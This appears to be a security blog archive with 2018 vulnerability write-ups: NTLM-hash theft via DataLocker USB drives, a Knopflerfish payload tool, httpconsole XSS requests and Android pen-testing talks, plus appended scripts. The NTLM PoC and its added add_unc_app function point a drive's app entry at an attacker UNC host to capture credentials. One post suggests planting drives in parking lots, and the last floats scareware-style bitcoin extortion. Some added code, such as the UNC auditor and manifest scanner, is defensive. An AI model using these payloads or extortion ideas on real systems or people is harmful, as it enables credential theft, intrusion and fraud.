Monday, September 17, 2018
Nabbing NTLM Hashes With DataLocker Sentry ONE Managed USB Drives
I found that the DataLocker Simply Secure device management software can be used to send the current user's NTLM hash to any remote server an attacker chooses, with no interaction from the user and without the user's knowledge. The user simply has to run the unlock software and input the correct password, which auto-launches the management software, triggering an SMB call.
Exploiting this needs write access to the drive's unlocked contents: an insider, malware on a host where the drive is unlocked, or a planted drive. You could drop a few in a parking lot with the password on a small piece of paper tucked in the cap; because the drive is password protected, people may be more curious to check it out.
PoC:
Set up an SMB server that demands authentication on connect and records the NTLM challenge/response (Metasploit: auxiliary/server/capture/smb).
Edit the management software's config on the drive so the SMB server's UNC path is registered as an app (Drive Letter:\.Apps\.apps.db).
Add the following Appl entry after the AdditionalApplications tag:
<Appl>
  <Identifier>0</Identifier>
  <AppPath>\\attack.machine\</AppPath>
  <Args></Args>
  <IconPath></IconPath>
  <DisplayName></DisplayName>
  <Summary></Summary>
  <Url></Url>
  <InternalVersion>0</InternalVersion>
  <OS>0</OS>
</Appl>
Close and relock the device, then move it to another computer or re-run the unlock software.
Authenticate to the device; the management software auto-launches and makes the SMB request.
Check Metasploit for the captured NTLM challenge/response (NTLMv1 or NTLMv2, depending on the client's LmCompatibilityLevel), which can then be cracked offline.
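The two halves of the PoC in code, as an added example that is neither DataLocker's software nor the post's own tooling: one function applies the Appl edit above to an .apps.db, the other is the check a defender would run over a drive's .apps.db to flag any app path that would make the launcher reach out to a remote host. Since the real .apps.db schema is not on the page, the sample file below is constructed and the example assumes .apps.db is XML with an AdditionalApplications element that holds Appl children.

```python
"""Added example (not DataLocker's code or the post's): apply the PoC edit to an
.apps.db and audit an .apps.db for app paths that point at remote hosts.

Assumption (the real schema is not on the page): .apps.db is XML with an
<AdditionalApplications> element, and the PoC <Appl> entry goes inside it.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample of an .apps.db holding one benign local entry.
SAMPLE_APPS_DB = r"""<AppsDb>
  <AdditionalApplications>
    <Appl>
      <Identifier>1</Identifier>
      <AppPath>C:\Tools\notepad.exe</AppPath>
      <Args></Args>
      <IconPath></IconPath>
      <DisplayName>Notepad</DisplayName>
      <Summary></Summary>
      <Url></Url>
      <InternalVersion>0</InternalVersion>
      <OS>0</OS>
    </Appl>
  </AdditionalApplications>
</AppsDb>"""

# Field order exactly as in the PoC entry.
APPL_FIELDS = ["Identifier", "AppPath", "Args", "IconPath", "DisplayName",
               "Summary", "Url", "InternalVersion", "OS"]

# UNC path: \\host\... or //host/... (Windows accepts either separator),
# plus the \\?\UNC\host\... long-path form.
UNC_RE = re.compile(r"^(\\\\|//)(\?[\\/]UNC[\\/])?[^\\/]+", re.IGNORECASE)


def add_unc_app(xml_text: str, unc_path: str, identifier: int = 0) -> str:
    """Append the PoC <Appl> entry (AppPath = attacker UNC path); return new XML."""
    root = ET.fromstring(xml_text)
    container = root.find(".//AdditionalApplications")
    if container is None:
        raise ValueError("no AdditionalApplications element in .apps.db")
    appl = ET.SubElement(container, "Appl")
    values = {"Identifier": str(identifier), "AppPath": unc_path,
              "InternalVersion": "0", "OS": "0"}
    for field in APPL_FIELDS:
        ET.SubElement(appl, field).text = values.get(field, "")
    return ET.tostring(root, encoding="unicode")


def find_remote_app_paths(xml_text: str) -> list:
    """Defender check: every AppPath that would make the launcher touch a remote host."""
    root = ET.fromstring(xml_text)
    hits = []
    for appl in root.iter("Appl"):
        path = (appl.findtext("AppPath") or "").strip()
        if UNC_RE.match(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    patched = add_unc_app(SAMPLE_APPS_DB, "\\\\attack.machine\\")
    print("remote app paths before:", find_remote_app_paths(SAMPLE_APPS_DB))
    print("remote app paths after: ", find_remote_app_paths(patched))
```

On a real drive, point find_remote_app_paths at the contents of Drive Letter:\.Apps\.apps.db; any hit means the next unlock will authenticate to that host. The check only matches the path shapes listed in UNC_RE, so a path that reaches a remote host through a mapped drive letter or a symlink would not be flagged.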
Why they would allow this, or just didn't think of it when they were developing the software, I don't know.
Sunday, August 19, 2018
Knopflerf*ck tool - A Knopflerfish attack tool
KFT usage and "modes"
Mode 1 runs an enum scan
-Checks for default bundle info, the HTTP console, and whether the remote framework is running
-Usage: python knopflerfucktool.py 1
Mode 2 outputs a payload to upload however you like
-Usage: python knopflerfucktool.py 2
-This mode also makes the payload needed for mode 3
-Requires openJDK 1.8.0 and Eclipse Equinox (eceq.jar)
Mode 3 uses the KF Remote Framework to upload and run a payload
-Usage: python knopflerfucktool.py 3
-This mode needs the payload from mode 2
-The payload needs to be hosted on the web root of http://
Get it at GitHub
Tuesday, July 24, 2018
Knopflerfish bundle httpconsole 4.0.1 XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Cross Site Scripting x2
[x] Vendor: Knopflerfish Project
[x] Vendor Website: https://www.knopflerfish.org
[x] Bundle Name: httpconsole
[x] Bundle Version: 4.0.1
[x] Bundle DL: https://www.knopflerfish.org/releases/current/osgi/jars/httpconsole/httpconsole_all-4.0.1.jar
[x] Found by: Anarchy Angel
[x] Twitter: @anarchyang31
[x] URL: https://aahideaway.blogspot.com
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[1] Pre-authentication XSS in login page.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: loginname
exp:
POST /servlet/console HTTP/1.1
Host: knopflerfish-server:8080
...
loginname=[XSS]&loginpwd=asd&login_cmd=Login
====
[2] Post authentication XSS in management console.
Method: POST
URL: http://knopflerfish-server:8080/servlet/console
Variable: cmd_install_url
exp:
POST /servlet/console HTTP/1.1
Host: knopflerfish-server:8080
...
bundle_id=29&cmd_install_url=[XSS]&cmd_installurl=install
Ummm firsties? :)
Labels: LHFI
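A small probe for both findings above, as an added example that is not the advisory author's tooling or Knopflerfish code: it builds the two POST bodies from the advisory with a marker in the [XSS] slot and classifies a response as reflecting the marker raw, HTML-escaped, or not at all. The marker string, the helper names, and the constructed response pages used in the sample run are all this example's own; the post-authentication request assumes you pass a valid console session cookie, which the advisory does not describe.

```python
"""Added example (not the advisory's or Knopflerfish's code): probe the two
httpconsole parameters from the advisory for unescaped reflection."""
import html
import urllib.error
import urllib.parse
import urllib.request

CONSOLE_PATH = "/servlet/console"
# Marker with the characters that matter for HTML injection; chosen here, not from the advisory.
MARKER = '<kft"xss>'


def build_probe_bodies(marker: str) -> dict:
    """The two POST bodies from the advisory with `marker` in the [XSS] position."""
    return {
        "pre-auth loginname": urllib.parse.urlencode(
            {"loginname": marker, "loginpwd": "asd", "login_cmd": "Login"}),
        "post-auth cmd_install_url": urllib.parse.urlencode(
            {"bundle_id": "29", "cmd_install_url": marker, "cmd_installurl": "install"}),
    }


def classify_reflection(page: str, marker: str) -> str:
    """'raw' if the marker comes back verbatim (XSS), 'escaped' if only HTML-encoded, else 'absent'."""
    if marker in page:
        return "raw"
    if html.escape(marker, quote=True) in page:
        return "escaped"
    return "absent"


def probe(base_url: str, session_cookie: str = None, timeout: float = 10) -> dict:
    """Send both requests to a live console and classify each response body."""
    results = {}
    for name, body in build_probe_bodies(MARKER).items():
        req = urllib.request.Request(
            base_url.rstrip("/") + CONSOLE_PATH, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        if session_cookie and name.startswith("post-auth"):
            req.add_header("Cookie", session_cookie)  # assumed: console keeps a cookie session
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                page = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # error pages can reflect input too
            page = err.read().decode("utf-8", "replace")
        results[name] = classify_reflection(page, MARKER)
    return results


# Constructed response pages standing in for a live server in the sample run.
VULNERABLE_PAGE = '<p>Login failed for user <kft"xss></p>'
FIXED_PAGE = '<p>Login failed for user &lt;kft&quot;xss&gt;</p>'

if __name__ == "__main__":
    for name, body in build_probe_bodies(MARKER).items():
        print(name, "->", body)
    print("vulnerable page:", classify_reflection(VULNERABLE_PAGE, MARKER))
    print("fixed page:     ", classify_reflection(FIXED_PAGE, MARKER))
    # Against a real target: probe("http://knopflerfish-server:8080", "JSESSIONID=...")
```

Only "raw" is a confirmed finding; "escaped" is what a patched console should return for both parameters, and "absent" for the post-authentication request usually means the session cookie was missing or expired rather than that the bug is gone.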
Saturday, June 2, 2018
Files for part 3 of 3 from Fully Functional & Programmed in Multiple Techniques
This time we covered broadcast receiver abuse in Android applications.
Here is the android studio project
Slides from the demo
Here is the cheatsheet I keep talking about :)
Many thanks to stl2600 and Arch Reactor for allowing me to do stuff in the space! I hope everyone enjoyed this small series of presentations.
Thank you all!
Saturday, May 5, 2018
Files for part 2 of 3 from Fully Functional & Programmed in Multiple Techniques
This time we covered content provider abuse in Android applications.
Here is the android studio project
Slides from the demo
I hope everyone enjoyed this presentation.
Thank you.
Monday, April 16, 2018
Files for part 1 of 3 from Fully Functional & Programmed in Multiple Techniques
More info on series here - https://www.meetup.com/St-Louis-2600/events/skcdpnyxgbjb/
Apps to inspect other apps' AndroidManifest.xml files and manipulate their activities:
Apk Analyzer by Martin Styk
Apk Analyzer by Dinostudio8891
Same name and some overlap, but one gives you a better view of the AndroidManifest.xml file (Martin) and the other gives you more control over the exposed components (Dino). You can find both in the Play Store.
Sorry it took me so long to get this up...
Saturday, March 31, 2018
Three part series on android app pen-testing at stl2600/dc314 by me!
Come join me while I do a three part series on android app pen-testing at the next three stl2600/DC314 meetings!
First session is setup and intent spoofing. (5/6/18)
Second is exploiting exported content providers and insecure file storage. (6/4/18)
Third is exploiting exported broadcast receivers. (7/1/18)
In each case we examine the source code of an app with the vuln and how to exploit it, then discuss the hallmarks for finding the same thing in other apps ("grep dorks").
People can/should bring their own systems to play along! I hope to see you there!
More info HERE
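The "grep dork" for all three sessions is the same question asked of AndroidManifest.xml: which activities, content providers, broadcast receivers and services are reachable from other apps, and which of those are not behind a permission. The script below is an added example, not part of the series files or the Apk Analyzer apps named above; it parses a constructed manifest and lists the exposed components. It applies the platform rule that a component is exported when android:exported="true" or, for apps targeting API 30 and below, when it has an intent-filter and no exported attribute (API 31+ rejects that case at install), and it skips the launcher activity since that one is exported by design. The package and component names are invented for the sample.

```python
"""Added example (not from the series files): list exported components in an
AndroidManifest.xml and flag the ones no permission protects.

Export rule applied: android:exported="true", or no exported attribute plus an
intent-filter (the pre-API-31 default; API 31+ requires the attribute)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "receiver", "service", "provider")
LAUNCHER = "android.intent.category.LAUNCHER"

# Constructed manifest; package and component names are invented.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.vulnapp">
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <activity android:name=".HiddenActivity" android:exported="false"/>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.vulnapp.notes"
              android:exported="true"/>
    <provider android:name=".SecretsProvider"
              android:authorities="com.example.vulnapp.secrets"
              android:exported="true"
              android:permission="com.example.vulnapp.READ_SECRETS"/>
    <receiver android:name=".CommandReceiver">
      <intent-filter>
        <action android:name="com.example.vulnapp.RUN_COMMAND"/>
      </intent-filter>
    </receiver>
    <service android:name=".SyncService"/>
  </application>
</manifest>"""


def _is_launcher(elem) -> bool:
    return any(cat.get(ANDROID_NS + "name") == LAUNCHER for cat in elem.iter("category"))


def find_exposed_components(manifest_xml: str) -> list:
    """Return dicts {type, name, reason, protected} for every component other apps can reach."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for elem in root.iter():
        if elem.tag not in COMPONENTS or _is_launcher(elem):
            continue
        exported = elem.get(ANDROID_NS + "exported")
        has_filter = elem.find("intent-filter") is not None
        if exported == "true":
            reason = 'android:exported="true"'
        elif exported is None and has_filter:
            reason = "intent-filter without android:exported (exported by default before API 31)"
        else:
            continue
        # Any of these attributes gates access behind a permission.
        protected = any(elem.get(ANDROID_NS + attr) is not None
                        for attr in ("permission", "readPermission", "writePermission"))
        findings.append({"type": elem.tag, "name": elem.get(ANDROID_NS + "name"),
                         "reason": reason, "protected": protected})
    return findings


def unprotected_names(findings: list) -> list:
    """Names of exposed components with no permission attribute: the first things to poke at."""
    return [f["name"] for f in findings if not f["protected"]]


if __name__ == "__main__":
    found = find_exposed_components(SAMPLE_MANIFEST)
    for f in found:
        print(f"{f['type']:9} {f['name']:18} {'protected' if f['protected'] else 'OPEN':9} {f['reason']}")
    print("unprotected:", unprotected_names(found))
```

On a real target, pull the manifest out of the APK first (apktool d app.apk gives a readable AndroidManifest.xml; the binary one inside the APK will not parse). The script tells you where to look, not whether a component is exploitable: a permission with android:protectionLevel="normal" still lets any app through, and a provider's grantUriPermissions and path-permission settings need reading by hand.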
Saturday, February 10, 2018
Advanced HaX11 Social Engineering Functionality
This attack also has a higher success rate at getting execution, relative to the app's other functions, because rather than depending on the target's configuration to share windows/desktops, you share a window to it!
Another thought I was playing around with was a type of ransomware attack where you just keep popping the window until they give you bitcoins. The idea is the victim will have no idea what's really going on and might assume they really are infected with some of the ransomware they see on TV. The scareware approach might work as well. Anyway, those are just a few ideas, but how you use it is really up to you. Enjoy.